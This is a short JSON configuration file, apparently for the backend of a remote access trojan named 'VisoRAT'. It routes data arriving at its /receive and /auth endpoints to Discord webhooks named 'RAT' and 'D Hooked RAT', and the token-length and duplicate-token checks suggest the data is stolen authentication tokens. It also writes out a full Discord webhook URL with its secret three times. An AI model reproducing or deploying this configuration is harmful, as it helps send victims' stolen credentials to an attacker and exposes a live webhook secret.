{
    "security": {
        "rate_limit_seconds": 600,
        "min_token_length": 128,
        "check_duplicate_tokens": true
    },
    "endpoints": {
        "/receive": {
            "webhooks": [
                {
                    "url": "https://discord.com/api/webhooks/1471875987439616031/1h4lYMivT4S7OgYSRkseMWwQxdIs27RkR7j6eDdBFpzUqy1l5ht1RMpok-oJTT0LzIUZ",
                    "name": "D Hooked RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                },
                {
                    "url": "https://discord.com/api/webhooks/1471875987439616031/1h4lYMivT4S7OgYSRkseMWwQxdIs27RkR7j6eDdBFpzUqy1l5ht1RMpok-oJTT0LzIUZ", 
                    "name": "RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                }
            ]
        },
        "/auth": {
            "webhooks": [
                {
                    "url": "https://discord.com/api/webhooks/1471875987439616031/1h4lYMivT4S7OgYSRkseMWwQxdIs27RkR7j6eDdBFpzUqy1l5ht1RMpok-oJTT0LzIUZ",
                    "name": "Not D Hooked RAT",
                    "footer": "VisoRAT",
                    "color": 7414964,
					"avatar_url": "https://bigrat.monster/media/bigrat.jpg"
                }
            ]
        }
    }

}
